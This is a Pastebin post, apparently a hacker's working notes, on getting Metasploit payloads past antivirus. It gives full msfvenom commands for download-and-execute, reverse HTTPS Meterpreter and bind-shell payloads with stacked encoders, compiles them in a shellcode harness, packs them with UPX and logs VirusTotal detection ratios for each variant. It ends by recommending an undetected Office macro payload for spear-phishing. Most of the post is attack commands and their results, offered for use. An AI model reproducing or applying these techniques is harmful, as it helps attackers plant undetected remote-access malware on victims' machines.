Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Using Shellcode execution as a possible antivirus bypassal technique.
- Ok, first off, we need to create our malicious "shellcode payload"... I have a few examples below of some possible payloads we could be using.
- 1. Download and execute.
- msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c
- 2. Reverse Meterpreter HTTPS shell
- msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c
- 3. Standard Bind Shell
- msfvenom -p windows/shell_bind_tcp LPORT=31337 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c
- These are the three payloads I will be testing. The encoding I chose at random and just went with the encoding that "felt right". I will not be running them, just uploading them to VirusTotal to show you them compared to their .exe outputs. Bin size (before and after UPX) and AV detections will be taken as the final "idea of how awesome they are".
- Step One: Download and Execute Payload.
- Here is the commands we will be using to make our "native metasploit exe" version (direct MSFVENOM output) of the dl/exec payload.
- msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/dlexec.exe
- So. We got our binary, and we upload to VirusTotal Scanning service to see how many detections we get...
- Filename: dlexec.exe
- Filesize: 72.1 KB
- MD5 Hash: aeace18d84af11640a219b2b557ee8ee
- Packing: No UPX used.
- Detections: 32/42
- (Detections are at time of scan)
- Link: https://www.virustotal.com/file/9e5c565e48de976e14d316db667cf22f3b50671f47e38ff0864775e5888ee51b/analysis/1332350345/
- Next up we UPX it with this command: upx -9 dlexec.exe
- Filesize: 47.0KB
- MD5 Hash: ac4375e1a7fe474548dd798bd60f8f04
- Detections: 27/43
- (Detections are at time of scan)
- Link: https://www.virustotal.com/file/fef15aee195c8bdcbbee3cbbc91fab36791a172096f06152e24a9b1862d1405c/analysis/1332350651/
- Now, we re-do the whole thing with the ShellCodeExec Method which should be a LOT less detected.
- First, we create our shellcode:
- msfvenom -p windows/download_exec URL=http://www.example.com/malware.exe -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f c
- Now, we pop it into our shellcode-harness...
- And compile: i586-mingw32msvc-gcc meta.c -o dlcrypt.exe
- Filename: dlcrypt.exe
- Filesize: 20.1KB
- MD5 Hash: f873ab0d718dbd61b7987c7467ae589c
- Packing: No UPX used.
- Detections: 14 / 43
- (Detections are at time of scan)
- Link: https://www.virustotal.com/file/38f34eae9f19c401f61406d80d47e9280fa689b3abcfdfb17571849f69d0de17/analysis/1332351185/
- As you can see, it is a far smaller file with a lot less detections. Lets UPX it and see what happens next...
- Filename: dlcrypt.exe
- Filesize: 14.1 KB
- MD5 Hash: 03d634dde3d1e573d99776009e8567f5
- Packing: UPX used.
- Detections: 18 / 43
- (Detections are at time of scan)
- Link: https://www.virustotal.com/file/fc6e15bc19fc1f1bfaec9aeac8f2ede308e3d78b3e4efe90ab3b0804d8bafd4d/analysis/1332351313/
- It would appear UPX is counterproductive to bypassing AV (packers normally are...) so tomorrow I will try the second payload, my FAVOURITE one, the Meterpreter Reverse HTTPS payload.
- Ok. Reverse HTTPS payload time!
- Here is the commands we will be using to make our "native metasploit exe" version (direct MSFVENOM output) of the reverse https meterpreter payload.
- msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe > /tmp/payload.exe
- So. We got our binary, and we upload to VirusTotal Scanning service to see how many detections we get...
- Filename: payload.exe
- Filesize: 72.1 KB
- MD5 Hash: dd347fcf69bdbc33f1ea2b318cf4831c
- Packing: No UPX used.
- Detections: 30 / 43
- (Detections are at time of scan)
- Link: https://www.virustotal.com/file/6a7cbf711f24a7ff1ae14a83ff193b4c17b3043516d5bd7366a7db736c793b8f/analysis/1332423872/
- Next up, we UPX
- Filename: payload.exe
- Filesize: 47.0 KB
- MD5 Hash: 5cdf49f9df5701f76b9ee9f8917e6d05
- Packing: UPX used.
- Detections: 26 / 42
- (Detections are at time of scan)
- Link: https://www.virustotal.com/file/fc11cfbcbd5d13a5acce3e4fb82f93133bbc62e8df6d00ff8478faa3bdf1e113/analysis/1332424184/
- AS you can see, UPX had a positive effect this time. Now I then noticed something bloody amazing in the MSFVENOM manual.
- exe-small output.
- msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/payload.exe
- No encoding used this time BTW.
- Filename: payload.exe
- Filesize: 4.5 KB
- MD5 Hash: 0bd184dd04ff1015ffbce7e792c2c598
- Packing: None
- Detections: 13 / 43
- Link: https://www.virustotal.com/file/bd9d1d6228e0aad08f3bb885bbf1d8f8e4c78b4530f8dd5b82da96e52b6a5c3f/analysis/1332424669/
- SO, lets add some encoding and see what happens...
- ##
- msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -e x86/shikata_ga_nai -i 5 -e x86/countdown -i 3 -e x86/call4_dword_xor -i 5 -e x86/jmp_call_additive -i 5 -f exe-small > 1.exe
- https://www.virustotal.com/file/e946566e5c0162c4090f126cb12077926433f66c62c9354fa730242ade663b3c/analysis/1332427945/
- More detected? WTF? Fine. lets move on...
- ##
- Now, I started looking into alternative outputs... And came up with this.
- msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f vba-exe > /tmp/vba.exe
- Filename: vba.exe
- Filesize: 290.2 KB
- MD5 Hash: aedde86916de88b856b22c6e384901bb
- Packing: None
- Detections: 0 / 42
- Link: https://www.virustotal.com/file/66e496f92029e31ab2c9df7ba886502efb3fa471d5451828df7c99d56f71dc56/analysis/1332427482/
- This is a MS Office Macro payload. Simply open it in a text editor and follow the instructions...
- Final Notes: The MS Office Macro payload is likely the most promising of the lot, as it can be directly embedded into a MS-Word document for spear phishing attacks, and seems to auto bypass things like AV.
- Now for ONE LAST TRY: Objdump Pwnage.
- root@shinigami:/tmp# msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 -f exe-small > /tmp/micro.exe
- root@shinigami:/tmp# wget http://www.projectshellcode.com/downloads/xxd-shellcode.sh
- root@shinigami:/tmp# chmod +x xxd-shellcode.sh
- root@shinigami:/tmp# ./xxd-shellcode.sh micro.exe > sc.txt
- ### Here is where you pop the contents of sc.txt into the shellcode test harness as before ###
- root@shinigami:/tmp# i586-mingw32msvc-gcc sc.c -o helloshell.exe
- SO now we scan our new binary... See how "bypassing" it is. We can take this further BTW...
- MD5: 7642f0914ebbe62ddc8d64ffe7d52783
- File size: 24.1 KB ( 24650 bytes )
- File name: helloshell.exe
- File type: Win32 EXE
- Detection ratio: 10 / 43
- Link: https://www.virustotal.com/file/90add485b7df79d83588412ce59d76707c27914a2d0d86d731669670c4f6bac3/analysis/1332429280/
- Next: We UPX it...
- MD5: 963253a72210eb8bd7155137713112ba
- File size: 16.6 KB ( 16970 bytes )
- File name: helloshell.exe
- File type: Win32 EXE
- Detection ratio: 10 / 41
- Link: https://www.virustotal.com/file/6ca78ead1a8ef1c910f921eeab21af48a021db13872a3ad64a6ec6f8c2e228cb/analysis/1332429381/
- So then I take this variant, pretend it is micro.exe, and re-encode it...
- Result?
- PRE UPX:
- MD5: a34d634236388762de0801acdd587cc9
- File size: 36.1 KB ( 36938 bytes )
- File name: helloshell2.exe
- File type: Win32 EXE
- Detection ratio: 5 / 43
- Link: https://www.virustotal.com/file/bc2e51bca3b3895bf59607ab1dbe1bbbfe6fff494642556660d30cf8dae1045e/analysis/1332429607/
- POST UPX:
- Detections: 10 / 42
- Link: https://www.virustotal.com/file/726ced89801acc785f9360d595e7de390c3c19dafeecffcb2db14eb2d00e94b6/analysis/1332429713/
- root@shinigami:/tmp# exit
- I went up to 10 iterations with no real advantage, but perhaps alternating extra encodings (shigati_ga_nai) may help. i will investigate this later.
- ~infodox
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement